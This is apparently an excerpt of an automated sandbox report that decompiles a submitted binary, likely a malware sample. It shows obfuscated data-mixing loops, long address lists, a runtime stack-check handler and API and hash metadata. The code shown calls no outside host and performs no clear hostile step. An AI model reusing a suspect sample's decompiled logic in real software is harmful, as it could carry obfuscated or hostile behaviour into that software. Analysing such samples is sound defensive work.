      					_v2100 =  *0x417690;
      					_v2092 =  *0x4176a8;
      					_v2084 =  *0x4174f8;
      					_v2076 =  *0x417880;
      					_v2068 =  *0x4177d0;
      					_v2060 =  *0x417828;
      					_v2052 =  *0x417970;
      					_v2044 =  *0x417698;
      					_t2860 =  *0x4175a8;
      					_v2036 = _t2860;
      					asm("fld1");
      					_v2028 = _t2860;
      					_v2020 =  *0x417600;
      					_v2012 =  *0x417510;
      					_v2004 =  *0x417918;
      					_v1996 =  *0x417780;
      					_v1988 =  *0x4179f0;
      					_v1980 =  *0x4174e0;
      					_v1972 =  *0x417328;
      					_v1964 =  *0x417748;
      					_v1956 =  *0x4177b8;
      					_v1948 =  *0x4173a0;
      					_v1940 =  *0x4178b0;
      					_v1932 =  *0x417360;
      					_v1924 =  *0x417480;
      					_v1916 =  *0x4172b8;
      					_v1908 =  *0x4172a8;
      					_v1900 =  *0x417968;
      					_v1892 =  *0x4172a0;
      					_v1884 =  *0x417298;
      					_v1876 =  *0x4176c0;
      					_v1868 =  *0x417960;
      					_v1860 =  *0x4177f8;
      					_v1852 =  *0x417290;
      					_v1844 =  *0x417808;
      					_v1836 =  *0x417508;
      					_v1828 =  *0x417638;
      					_v1820 =  *0x4178e8;
      					_v1812 =  *0x417550;
      					_v1804 =  *0x417420;
      					_v1796 =  *0x417808;
      					_v1788 =  *0x417320;
      					_v1780 =  *0x417288;
      					_v1772 =  *0x417858;
      					_v1764 =  *0x417970;
      					_v1756 =  *0x417598;
      					_v1748 =  *0x4174b0;
      					_v1740 =  *0x4177b0;
      					_v1732 =  *0x417308;
      					_v1724 =  *0x417280;
      					_v1716 =  *0x417978;
      					_v1708 =  *0x417278;
      					_v1700 =  *0x417668;
      					_v1692 =  *0x417978;
      					_v1684 =  *0x4175d0;
      					_v1676 =  *0x417738;
      					_v1668 =  *0x417480;
      					_v1660 =  *0x417478;
      					_v1652 =  *0x417270;
      					_v1644 =  *0x417960;
      					_v1636 =  *0x417820;
      					_v1628 =  *0x417370;
      					_v1620 =  *0x417700;
      					_v1612 =  *0x417268;
      					_v1604 =  *0x417260;
      					_v1596 =  *0x417818;
      					_v1588 =  *0x417570;
      					_v1580 =  *0x417370;
      					_v1572 =  *0x417858;
      					_v1564 =  *0x4175d0;
      					_v1556 =  *0x417380;
      					_v1548 =  *0x417970;
      					_v1540 =  *0x417480;
      					_v1532 =  *0x4178a8;
      					_v1524 =  *0x4179f8;
      					_v1516 =  *0x417450;
      					_v1508 =  *0x417408;
      					_v1500 =  *0x417668;
      					_v1492 =  *0x4173b0;
      					_v1484 =  *0x417388;
      					_v1476 =  *0x4178a0;
      					_v1468 =  *0x4174d0;
      					_v1460 =  *0x417970;
      					_v1452 =  *0x417938;
      					_v1444 =  *0x417720;
      					_v1436 =  *0x4172d8;
      					_v1428 =  *0x417918;
      					_v1420 =  *0x417728;
      					_v1412 =  *0x4177b8;
      					_v1404 =  *0x4179d0;
      					_v1396 =  *0x4172a0;
      					_v1388 =  *0x417278;
      					_v1380 =  *0x4173a0;
      					_v1372 =  *0x417690;
      					_v1364 =  *0x4178c8;
      					_v1356 =  *0x4178a0;
      					_v1348 =  *0x417738;
      					_v1340 =  *0x417520;
      					_v1332 =  *0x4178b0;
      					_v1324 =  *0x417398;
      					_v1316 =  *0x4178f0;
      					_v1308 =  *0x4177b0;
      					_v1300 =  *0x4175c0;
      					_v1292 =  *0x4178c0;
      					_v1284 =  *0x4179a0;
      					_v1276 =  *0x417370;
      					_v1268 =  *0x417608;
      					_v1260 =  *0x417900;
      					_v1252 =  *0x417918;
      					_v1244 =  *0x417258;
      					_v1236 =  *0x417848;
      					_v1228 =  *0x417560;
      					_v1220 =  *0x4179e0;
      					_v1212 =  *0x4172a8;
      					_v1204 =  *0x417840;
      					_v1196 =  *0x417958;
      					_v1188 =  *0x4175d8;
      					_v1180 =  *0x417918;
      					_v1172 =  *0x417668;
      					_v1164 =  *0x417710;
      					_v1156 =  *0x4172c8;
      					_v1148 =  *0x4174a8;
      					_v1140 =  *0x417388;
      					_v1132 =  *0x4173b0;
      					_v1124 =  *0x417850;
      					_v1116 =  *0x417730;
      					_v1108 =  *0x417440;
      					_v1100 =  *0x417350;
      					_v1092 =  *0x417940;
      					_v1084 =  *0x417250;
      					_v1076 =  *0x4172a0;
      					_v1068 =  *0x417370;
      					_v1060 =  *0x4177b8;
      					_v1052 =  *0x4175f8;
      					_v1044 =  *0x417650;
      					_v1036 =  *0x417910;
      					_v1028 =  *0x417398;
      					_v1020 =  *0x417890;
      					_v1012 =  *0x417348;
      					_v1004 =  *0x417798;
      					_v996 =  *0x417548;
      					_v988 =  *0x417a10;
      					_v980 =  *0x417848;
      					_v972 =  *0x417688;
      					_v964 =  *0x417470;
      					_v956 =  *0x4174e0;
      					_v948 =  *0x4179f8;
      					_v940 =  *0x417250;
      					_v932 =  *0x417670;
      					_v924 =  *0x4176d0;
      					_v916 =  *0x417340;
      					_v908 =  *0x417278;
      					_v900 =  *0x4174a8;
      					_v892 =  *0x4176a8;
      					_v884 =  *0x417418;
      					_v876 =  *0x4175d8;
      					_v868 =  *0x4173a0;
      					_v860 =  *0x417520;
      					_v852 =  *0x417468;
      					_v844 =  *0x4172e0;
      					_v836 =  *0x417490;
      					_v828 =  *0x417550;
      					_v820 =  *0x417538;
      					_v812 =  *0x417598;
      					_v804 =  *0x417520;
      					_v796 =  *0x417840;
      					_v788 =  *0x417840;
      					_v780 =  *0x4177f8;
      					_v772 =  *0x417818;
      					_v764 =  *0x4177a0;
      					_v756 =  *0x4175c8;
      					_v748 =  *0x417610;
      					_v740 =  *0x4172b0;
      					_v732 =  *0x417430;
      					_v724 =  *0x417650;
      					_v716 =  *0x4179c8;
      					_v708 =  *0x417378;
      					_v700 =  *0x417800;
      					_v692 =  *0x417350;
      					_v684 =  *0x417700;
      					_v676 =  *0x4178c0;
      					_v668 =  *0x417858;
      					_v660 =  *0x417488;
      					_v652 =  *0x417350;
      					_v644 =  *0x4174c8;
      					_v636 =  *0x417460;
      					_v628 =  *0x4172b8;
      					_v620 =  *0x4177a8;
      					_v612 =  *0x417350;
      					_v604 =  *0x417630;
      					_v596 =  *0x417458;
      					_v588 =  *0x417430;
      					_v580 =  *0x417778;
      					_v572 =  *0x4179a0;
      					_v564 =  *0x4172b0;
      					_v556 =  *0x417800;
      					_v548 =  *0x417770;
      					_v540 =  *0x417760;
      					_v532 =  *0x4172b0;
      					_v524 =  *0x417278;
      					_v516 =  *0x4174a8;
      					_v508 =  *0x417990;
      					_v500 =  *0x417740;
      					_v492 =  *0x417558;
      					_v484 =  *0x417270;
      					_v476 =  *0x4176b8;
      					_v468 =  *0x4179f0;
      					_v460 =  *0x4173a8;
      					_v452 =  *0x417320;
      					_v444 =  *0x417448;
      					_v436 =  *0x4177a0;
      					_v428 =  *0x417320;
      					_v420 =  *0x417910;
      					_v412 =  *0x4175a0;
      					_v404 =  *0x4176f0;
      					_v396 =  *0x417418;
      					_v388 =  *0x417290;
      					_v380 =  *0x4174b0;
      					_v372 =  *0x417858;
      					_v364 =  *0x4177e0;
      					_v356 =  *0x4174c0;
      					_v348 =  *0x417530;
      					_v340 =  *0x4176e8;
      					_v332 =  *0x4179c8;
      					_t1668 =  *0x436040; // 0x240000
      					 *((char*)(_t1668 + _v300)) = ( *(_v272 + _v60) & 0x000000ff) + _v116;
      					_t1857 =  *0x42c008; // 0xd9
      					_v120 = _t1857 - 0x0000000f - (_v109 & 0x000000ff) ^ _v88;
      					_v228 = _v48 + _v144 + (_v32 & 0x0000ffff);
      					_t2037 =  *0x42c00c; // 0xffffd2e0
      					_v176 = _t2037 + _v56 + _v88;
      					_v156 = 0x58 - _v156;
      					_t1862 =  *0x43604c; // 0x0
      					_v24 = _t1862 - _v264 - 0x19 - (_v301 & 0x000000ff);
      					if(_v88 <= 0x15) {
      						_v176 = _v204 + _v36 + _v68;
      						_t2050 =  *0x42d020; // 0x0
      						_v260 = _v88 - 0x00000062 ^ _t2050 + 0x00000058;
      					}
      					_v244 = _v200 | 0x00000060;
      					_v60 = _v60 + 1;
      					_v176 = _v268 + 0xa2;
      					_v109 = 0xffffffdf - _v244 + _v244 + 0xa;
      					_v268 = (_v7 & 0x000000ff) - _v316;
      					_v140 = _v200 + 0x3a;
      					_t2044 =  *0x42d020; // 0x0
      					_v292 = _t2044 - _v204 ^ _v244;
      					_v316 = _v48 + _v88;
      				} while (_v60 != _v252);
      				_t1685 = _v200 - _v176 + _v212;
      				_v109 = (_v104 & 0x0000ffff) + 0x0000004f | _t1685;
      				return _t1685;
      			}

      0x00405f23
      0x00405f2f
      0x00405f3b
      0x00405f47
      0x00405f53
      0x00405f5f
      0x00405f6b
      0x00405f77
      0x00405f83
      0x00405f8f
      0x00405f9b
      0x00405fa7
      0x00405fb3
      0x00405fbf
      0x00405fcb
      0x00405fd7
      0x00405fe3
      0x00405fef
      0x00405ffb
      0x00406007
      0x00406013
      0x0040601f
      0x0040602b
      0x00406037
      0x00406043
      0x0040604f
      0x0040605b
      0x00406067
      0x00406073
      0x0040607f
      0x0040608b
      0x00406097
      0x004060a3
      0x004060af
      0x004060bb
      0x004060c7
      0x004060d3
      0x004060df
      0x004060eb
      0x004060f7
      0x00406103
      0x0040610f
      0x0040611b
      0x00406127
      0x00406133
      0x0040613f
      0x0040614b
      0x00406157
      0x00406163
      0x0040616f
      0x0040617b
      0x00406187
      0x00406193
      0x0040619f
      0x004061ab
      0x004061b7
      0x004061c3
      0x004061cf
      0x004061db
      0x004061e7
      0x004061f3
      0x004061ff
      0x0040620b
      0x00406217
      0x00406223
      0x0040622f
      0x0040623b
      0x00406247
      0x00406253
      0x0040625f
      0x0040626b
      0x00406277
      0x00406283
      0x0040628f
      0x0040629b
      0x004062a7
      0x004062b3
      0x004062bf
      0x004062cb
      0x004062d7
      0x004062e3
      0x004062ef
      0x004062fb
      0x00406307
      0x00406313
      0x0040631f
      0x0040632b
      0x00406337
      0x00406343
      0x0040634f
      0x0040635b
      0x00406367
      0x00406373
      0x0040637f
      0x0040638b
      0x00406397
      0x004063a3
      0x004063af
      0x004063bb
      0x004063c7
      0x004063d3
      0x004063df
      0x004063eb
      0x004063f7
      0x00406403
      0x0040640f
      0x0040641b
      0x00406427
      0x00406433
      0x0040643f
      0x0040644b
      0x00406457
      0x00406463
      0x0040646f
      0x0040647b
      0x00406487
      0x00406493
      0x0040649f
      0x004064ab
      0x004064b7
      0x004064c3
      0x004064cf
      0x004064db
      0x004064e7
      0x004064f3
      0x004064ff
      0x0040650b
      0x00406517
      0x00406523
      0x0040652f
      0x0040653b
      0x00406547
      0x00406553
      0x0040655f
      0x0040656b
      0x00406571
      0x00406577
      0x0040657d
      0x0040657f
      0x0040658b
      0x00406597
      0x004065a3
      0x004065af
      0x004065bb
      0x004065c7
      0x004065d3
      0x004065df
      0x004065eb
      0x004065f7
      0x00406603
      0x0040660f
      0x0040661b
      0x00406627
      0x00406633
      0x0040663f
      0x0040664b
      0x00406657
      0x00406663
      0x0040666f
      0x0040667b
      0x00406687
      0x00406693
      0x0040669f
      0x004066ab
      0x004066b7
      0x004066c3
      0x004066cf
      0x004066db
      0x004066e7
      0x004066f3
      0x004066ff
      0x0040670b
      0x00406717
      0x00406723
      0x0040672f
      0x0040673b
      0x00406747
      0x00406753
      0x0040675f
      0x0040676b
      0x00406777
      0x00406783
      0x0040678f
      0x0040679b
      0x004067a7
      0x004067b3
      0x004067bf
      0x004067cb
      0x004067d7
      0x004067e3
      0x004067ef
      0x004067fb
      0x00406807
      0x00406813
      0x0040681f
      0x0040682b
      0x00406837
      0x00406843
      0x0040684f
      0x0040685b
      0x00406867
      0x00406873
      0x0040687f
      0x0040688b
      0x00406897
      0x004068a3
      0x004068af
      0x004068bb
      0x004068c7
      0x004068d3
      0x004068df
      0x004068eb
      0x004068f7
      0x00406903
      0x00406909
      0x0040690f
      0x00406915
      0x00406917
      0x00406923
      0x0040692f
      0x0040693b
      0x00406947
      0x0040694d
      0x00406953
      0x00406959
      0x0040695b
      0x00406967
      0x00406973
      0x0040697f
      0x0040698b
      0x00406997
      0x004069a3
      0x004069af
      0x004069bb
      0x004069c7
      0x004069d3
      0x004069df
      0x004069eb
      0x004069f7
      0x00406a03
      0x00406a0f
      0x00406a1b
      0x00406a27
      0x00406a33
      0x00406a3f
      0x00406a4b
      0x00406a57
      0x00406a63
      0x00406a6f
      0x00406a7b
      0x00406a87
      0x00406a93
      0x00406a9f
      0x00406aab
      0x00406ab7
      0x00406ac3
      0x00406acf
      0x00406adb
      0x00406ae7
      0x00406af3
      0x00406aff
      0x00406b0b
      0x00406b17
      0x00406b23
      0x00406b2f
      0x00406b3b
      0x00406b47
      0x00406b53
      0x00406b5f
      0x00406b6b
      0x00406b77
      0x00406b83
      0x00406b8f
      0x00406b9b
      0x00406ba7
      0x00406bb3
      0x00406bbf
      0x00406bcb
      0x00406bd7
      0x00406be3
      0x00406bef
      0x00406bfb
      0x00406c07
      0x00406c13
      0x00406c1f
      0x00406c2b
      0x00406c37
      0x00406c43
      0x00406c4f
      0x00406c5b
      0x00406c67
      0x00406c73
      0x00406c7f
      0x00406c8b
      0x00406c97
      0x00406ca3
      0x00406caf
      0x00406cbb
      0x00406cc7
      0x00406cd3
      0x00406cdf
      0x00406ceb
      0x00406cf7
      0x00406d03
      0x00406d0f
      0x00406d1b
      0x00406d27
      0x00406d33
      0x00406d3f
      0x00406d4b
      0x00406d57
      0x00406d63
      0x00406d6f
      0x00406d7b
      0x00406d87
      0x00406d93
      0x00406d9f
      0x00406dab
      0x00406db7
      0x00406dc3
      0x00406dcf
      0x00406dd5
      0x00406ddb
      0x00406de1
      0x00406de3
      0x00406def
      0x00406dfb
      0x00406e07
      0x00406e13
      0x00406e1f
      0x00406e2b
      0x00406e37
      0x00406e43
      0x00406e4f
      0x00406e5b
      0x00406e67
      0x00406e73
      0x00406e7f
      0x00406e8b
      0x00406e97
      0x00406ea3
      0x00406eaf
      0x00406ebb
      0x00406ec7
      0x00406ed3
      0x00406edf
      0x00406eeb
      0x00406ef7
      0x00406f03
      0x00406f0f
      0x00406f1b
      0x00406f27
      0x00406f33
      0x00406f3f
      0x00406f4b
      0x00406f57
      0x00406f63
      0x00406f6f
      0x00406f7b
      0x00406f87
      0x00406f93
      0x00406f9f
      0x00406fab
      0x00406fb7
      0x00406fc3
      0x00406fcf
      0x00406fdb
      0x00406fe7
      0x00406ff3
      0x00406fff
      0x0040700b
      0x00407017
      0x00407023
      0x0040702f
      0x0040703b
      0x00407047
      0x00407053
      0x0040705f
      0x0040706b
      0x00407077
      0x00407083
      0x0040708f
      0x0040709b
      0x004070a7
      0x004070b3
      0x004070bf
      0x004070cb
      0x004070d7
      0x004070e3
      0x004070ef
      0x004070fb
      0x00407107
      0x00407113
      0x0040711f
      0x0040712b
      0x00407137
      0x00407143
      0x0040714f
      0x0040715b
      0x00407167
      0x00407173
      0x0040717f
      0x0040718b
      0x00407197
      0x004071a3
      0x004071af
      0x004071bb
      0x004071c7
      0x004071d3
      0x004071df
      0x004071eb
      0x004071f7
      0x00407203
      0x0040720f
      0x0040721b
      0x00407227
      0x00407233
      0x0040723f
      0x0040724b
      0x00407257
      0x00407263
      0x0040726f
      0x0040727b
      0x00407287
      0x00407293
      0x0040729f
      0x004072ab
      0x004072b7
      0x004072c3
      0x004072cf
      0x004072db
      0x004072e7
      0x004072f3
      0x004072ff
      0x0040730b
      0x00407317
      0x00407323
      0x0040732f
      0x0040733b
      0x00407347
      0x00407353
      0x0040735f
      0x0040736b
      0x00407377
      0x00407383
      0x00407389
      0x0040738f
      0x00407395
      0x00407397
      0x004073a3
      0x004073af
      0x004073bb
      0x004073c7
      0x004073d3
      0x004073df
      0x004073eb
      0x004073f7
      0x00407403
      0x0040740f
      0x0040741b
      0x00407427
      0x00407433
      0x0040743f
      0x0040744b
      0x00407457
      0x00407463
      0x0040746f
      0x0040747b
      0x00407487
      0x00407493
      0x0040749f
      0x004074ab
      0x004074b7
      0x004074c3
      0x004074cf
      0x004074db
      0x004074e7
      0x004074f3
      0x004074ff
      0x0040750b
      0x00407517
      0x00407523
      0x0040752f
      0x0040753b
      0x00407547
      0x00407553
      0x0040755f
      0x0040756b
      0x00407577
      0x00407583
      0x0040758f
      0x0040759b
      0x004075a7
      0x004075b3
      0x004075bf
      0x004075cb
      0x004075d7
      0x004075e3
      0x004075ef
      0x004075fb
      0x00407607
      0x00407613
      0x0040761f
      0x0040762b
      0x00407637
      0x00407643
      0x0040764f
      0x0040765b
      0x00407667
      0x00407673
      0x0040767f
      0x0040768b
      0x00407697
      0x0040769d
      0x004076a3
      0x004076a9
      0x004076ab
      0x004076b7
      0x004076c3
      0x004076cf
      0x004076db
      0x004076e7
      0x004076f3
      0x004076ff
      0x0040770b
      0x00407717
      0x00407723
      0x0040772f
      0x0040773b
      0x00407747
      0x00407753
      0x0040775f
      0x0040776b
      0x00407777
      0x00407783
      0x0040778f
      0x0040779b
      0x004077a7
      0x004077b3
      0x004077bf
      0x004077cb
      0x004077d7
      0x004077e3
      0x004077ef
      0x004077fb
      0x00407807
      0x00407813
      0x0040781f
      0x0040782b
      0x00407837
      0x00407843
      0x0040784f
      0x0040785b
      0x00407861
      0x00407867
      0x0040786d
      0x0040786f
      0x0040787b
      0x00407887
      0x00407893
      0x0040789f
      0x004078ab
      0x004078b7
      0x004078c3
      0x004078cf
      0x004078db
      0x004078e7
      0x004078f3
      0x004078ff
      0x0040790b
      0x00407917
      0x00407923
      0x0040792f
      0x0040793b
      0x00407947
      0x00407953
      0x0040795f
      0x0040796b
      0x00407977
      0x00407983
      0x0040798f
      0x0040799b
      0x004079a7
      0x004079b3
      0x004079bf
      0x004079cb
      0x004079d7
      0x004079e3
      0x004079ef
      0x004079fb
      0x00407a07
      0x00407a13
      0x00407a1f
      0x00407a2b
      0x00407a37
      0x00407a43
      0x00407a4f
      0x00407a5b
      0x00407a67
      0x00407a73
      0x00407a7f
      0x00407a8b
      0x00407a97
      0x00407aa3
      0x00407aaf
      0x00407abb
      0x00407ac7
      0x00407ad3
      0x00407adf
      0x00407aeb
      0x00407af7
      0x00407b03
      0x00407b0f
      0x00407b1b
      0x00407b21
      0x00407b27
      0x00407b2d
      0x00407b2f
      0x00407b3b
      0x00407b47
      0x00407b53
      0x00407b5f
      0x00407b6b
      0x00407b77
      0x00407b83
      0x00407b8f
      0x00407b9b
      0x00407ba7
      0x00407bb3
      0x00407bbf
      0x00407bcb
      0x00407bd7
      0x00407be3
      0x00407bef
      0x00407bfb
      0x00407c07
      0x00407c13
      0x00407c1f
      0x00407c2b
      0x00407c37
      0x00407c43
      0x00407c4f
      0x00407c5b
      0x00407c67
      0x00407c73
      0x00407c7f
      0x00407c8b
      0x00407c97
      0x00407ca3
      0x00407caf
      0x00407cbb
      0x00407cc7
      0x00407cd3
      0x00407cdf
      0x00407ceb
      0x00407cf7
      0x00407d03
      0x00407d0f
      0x00407d1b
      0x00407d27
      0x00407d33
      0x00407d3f
      0x00407d4b
      0x00407d57
      0x00407d63
      0x00407d6f
      0x00407d7b
      0x00407d87
      0x00407d93
      0x00407d9f
      0x00407dab
      0x00407db7
      0x00407dc3
      0x00407dcf
      0x00407ddb
      0x00407de7
      0x00407df3
      0x00407dff
      0x00407e0b
      0x00407e17
      0x00407e23
      0x00407e2f
      0x00407e3b
      0x00407e47
      0x00407e53
      0x00407e5f
      0x00407e6b
      0x00407e77
      0x00407e83
      0x00407e8f
      0x00407e9b
      0x00407ea7
      0x00407eb3
      0x00407ebf
      0x00407ecb
      0x00407ed7
      0x00407ee3
      0x00407eef
      0x00407efb
      0x00407f07
      0x00407f13
      0x00407f1f
      0x00407f2b
      0x00407f37
      0x00407f43
      0x00407f4f
      0x00407f5b
      0x00407f67
      0x00407f73
      0x00407f7f
      0x00407f8b
      0x00407f97
      0x00407fa3
      0x00407faf
      0x00407fbb
      0x00407fc7
      0x00407fd3
      0x00407fdf
      0x00407feb
      0x00407ff7
      0x00408003
      0x0040800f
      0x0040801b
      0x00408027
      0x00408033
      0x0040803f
      0x0040804b
      0x00408057
      0x00408063
      0x0040806f
      0x0040807b
      0x00408087
      0x00408093
      0x0040809f
      0x004080ab
      0x004080b7
      0x004080c3
      0x004080cf
      0x004080db
      0x004080e7
      0x004080f3
      0x004080ff
      0x0040810b
      0x00408117
      0x00408123
      0x0040812f
      0x0040813b
      0x00408147
      0x00408153
      0x0040815f
      0x0040816b
      0x00408177
      0x00408183
      0x0040818f
      0x0040819b
      0x004081a7
      0x004081b3
      0x004081bf
      0x004081cb
      0x004081d7
      0x004081e3
      0x004081ef
      0x004081fb
      0x00408207
      0x00408213
      0x0040821f
      0x0040822b
      0x00408237
      0x00408243
      0x0040824f
      0x0040825b
      0x00408267
      0x00408273
      0x0040827f
      0x0040828b
      0x00408297
      0x004082a3
      0x004082af
      0x004082bb
      0x004082c7
      0x004082d3
      0x004082df
      0x004082eb
      0x004082f7
      0x00408303
      0x0040830f
      0x0040831b
      0x00408327
      0x00408333
      0x0040833f
      0x0040834b
      0x00408357
      0x00408363
      0x0040836f
      0x0040837b
      0x00408387
      0x00408393
      0x0040839f
      0x004083ab
      0x004083b7
      0x004083c3
      0x004083cf
      0x004083db
      0x004083e7
      0x004083f3
      0x004083ff
      0x0040840b
      0x00408417
      0x00408423
      0x0040842f
      0x0040843b
      0x00408447
      0x00408453
      0x0040845f
      0x0040846b
      0x00408477
      0x00408483
      0x0040848f
      0x0040849b
      0x004084a7
      0x004084b3
      0x004084bf
      0x004084cb
      0x004084d7
      0x004084e3
      0x004084ef
      0x004084fb
      0x00408507
      0x00408513
      0x0040851f
      0x00408534
      0x0040853f
      0x00408541
      0x00408553
      0x00408566
      0x0040856c
      0x00408578
      0x00408589
      0x0040858f
      0x004085a7
      0x004085af
      0x004085bd
      0x004085c9
      0x004085d4
      0x004085d4
      0x004085e4
      0x004085f0
      0x004085ff
      0x0040861a
      0x00408627
      0x00408636
      0x0040863c
      0x0040864e
      0x0040865a
      0x00408663
      0x00408682
      0x0040868a
      0x00408690

      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID: $!$!$"$1$5$:
      • API String ID: 0-744832420
      • Opcode ID: d38e5a9a9c58b277ef392701666da75b3b01ee7bcd690fe9dc877ccd83e9f59d
      • Instruction ID: de6cfa0c6731dd31bf3af4478faae62b13f2d9d52110519dd7602d21abc02935
      • Opcode Fuzzy Hash: d38e5a9a9c58b277ef392701666da75b3b01ee7bcd690fe9dc877ccd83e9f59d
      • Instruction Fuzzy Hash: 8873583095996DC6EB60AF55FC886E8BF71FB88341F8281E4D0D861199CF311AF8CB59
      C-Code - Quality: 85%
      			E0040FE9A(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
      				intOrPtr _v0;
      				void* _v804;
      				intOrPtr _v808;
      				intOrPtr _v812;
      				intOrPtr _t6;
      				intOrPtr _t11;
      				intOrPtr _t12;
      				intOrPtr _t13;
      				long _t17;
      				intOrPtr _t21;
      				intOrPtr _t22;
      				intOrPtr _t25;
      				intOrPtr _t26;
      				intOrPtr _t27;
      				intOrPtr* _t31;
      				void* _t34;
      
      				_t27 = __esi;
      				_t26 = __edi;
      				_t25 = __edx;
      				_t22 = __ecx;
      				_t21 = __ebx;
      				_t6 = __eax;
      				_t34 = _t22 -  *0x42c4a0; // 0xe190ffa3
      				if(_t34 == 0) {
      					asm("repe ret");
      				}
      				 *0x4367e8 = _t6;
      				 *0x4367e4 = _t22;
      				 *0x4367e0 = _t25;
      				 *0x4367dc = _t21;
      				 *0x4367d8 = _t27;
      				 *0x4367d4 = _t26;
      				 *0x436800 = ss;
      				 *0x4367f4 = cs;
      				 *0x4367d0 = ds;
      				 *0x4367cc = es;
      				 *0x4367c8 = fs;
      				 *0x4367c4 = gs;
      				asm("pushfd");
      				_pop( *0x4367f8);
      				 *0x4367ec =  *_t31;
      				 *0x4367f0 = _v0;
      				 *0x4367fc =  &_a4;
      				 *0x436738 = 0x10001;
      				_t11 =  *0x4367f0; // 0x0
      				 *0x4366ec = _t11;
      				 *0x4366e0 = 0xc0000409;
      				 *0x4366e4 = 1;
      				_t12 =  *0x42c4a0; // 0xe190ffa3
      				_v812 = _t12;
      				_t13 =  *0x42c4a4; // 0x1e6f005c
      				_v808 = _t13;
      				 *0x436730 = IsDebuggerPresent();
      				_push(1);
      				E0040FE17(_t14);
      				SetUnhandledExceptionFilter(0);
      				_t17 = UnhandledExceptionFilter("?fC");
      				if( *0x436730 == 0) {
      					_push(1);
      					E0040FE17(_t17);
      				}
      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
      			}




















      APIs
      • IsDebuggerPresent.KERNEL32 ref: 00412B08
      • SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
      • UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
      • GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
      • TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID: fC
      • API String ID: 2579439406-201631668
      • Opcode ID: cb2e7dbc0ba11512d45034d35daa4d311946faf94d4044318c7593f26828c381
      • Instruction ID: 311a2433788c888b2570000bb709f37abea71b1efbf1095dc2b51b401d63ab1f
      • Opcode Fuzzy Hash: cb2e7dbc0ba11512d45034d35daa4d311946faf94d4044318c7593f26828c381
      • Instruction Fuzzy Hash: A721D4B4500302AFC710DF19F985A897BB4FB08718F92A03AE409877B5E7B459858F5D
      C-Code - Quality: 59%
      			E004151B9(void* _a4, intOrPtr _a16, signed int _a20, signed int* _a24) {
      				signed int _v8;
      				short _v10;
      				signed int _v12;
      				signed int _v14;
      				unsigned int _v16;
      				signed int _v18;
      				unsigned int _v20;
      				char _v25;
      				signed int _v26;
      				signed int _v28;
      				signed int _v30;
      				signed short _v32;
      				signed short _v34;
      				signed int _v36;
      				char _v41;
      				signed int _v42;
      				char _v43;
      				signed int _v44;
      				char _v45;
      				char _v46;
      				char _v47;
      				char _v48;
      				char _v49;
      				char _v50;
      				char _v51;
      				char _v52;
      				intOrPtr _v56;
      				intOrPtr _v60;
      				char _v62;
      				char _v64;
      				signed short _v68;
      				signed short _v72;
      				signed short _v76;
      				signed short _v80;
      				signed short _v84;
      				signed short* _v88;
      				signed short _v92;
      				signed int* _v96;
      				signed int _v100;
      				intOrPtr* _v104;
      				intOrPtr _v108;
      				signed int _v112;
      				signed short _v116;
      				signed short _v120;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t367;
      				signed int _t376;
      				signed short _t383;
      				signed short* _t385;
      				signed short _t386;
      				unsigned int _t389;
      				signed short _t392;
      				signed int _t393;
      				intOrPtr _t394;
      				signed short* _t406;
      				signed short _t408;
      				signed short _t414;
      				signed int _t417;
      				char* _t418;
      				signed short _t419;
      				signed short _t424;
      				signed short _t427;
      				signed int* _t433;
      				signed short _t437;
      				signed short _t439;
      				signed short _t440;
      				intOrPtr* _t441;
      				signed int _t449;
      				signed short _t452;
      				signed short _t456;
      				signed short _t457;
      				intOrPtr _t458;
      				signed short _t464;
      				unsigned int _t466;
      				signed short _t468;
      				unsigned int _t471;
      				signed short _t479;
      				signed short _t482;
      				signed short _t485;
      				signed int _t487;
      				short* _t489;
      				signed int _t492;
      				signed int _t498;
      				signed int _t499;
      				char _t508;
      				signed short _t509;
      				unsigned int _t511;
      				signed int _t512;
      				signed int _t513;
      				void* _t515;
      				signed int _t531;
      				signed int _t532;
      				signed int _t533;
      				void* _t535;
      				signed int _t543;
      				signed short _t556;
      				signed int _t559;
      				intOrPtr* _t560;
      				signed short _t571;
      				signed int _t572;
      				signed short _t574;
      				signed int _t576;
      				signed int _t589;
      				signed int _t594;
      				signed int _t605;
      
      				_t367 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t367 ^ _t605;
      				_t433 = _a24;
      				asm("movsd");
      				asm("movsd");
      				asm("movsw");
      				_t498 = _v12;
      				_t449 = _t498 & 0x00008000;
      				_t499 = _t498 & 0x00007fff;
      				_v100 = _t433;
      				_v52 = 0xcc;
      				_v51 = 0xcc;
      				_v50 = 0xcc;
      				_v49 = 0xcc;
      				_v48 = 0xcc;
      				_v47 = 0xcc;
      				_v46 = 0xcc;
      				_v45 = 0xcc;
      				_v44 = 0xcc;
      				_v43 = 0xcc;
      				_v42 = 0xfb;
      				_v41 = 0x3f;
      				_v120 = 1;
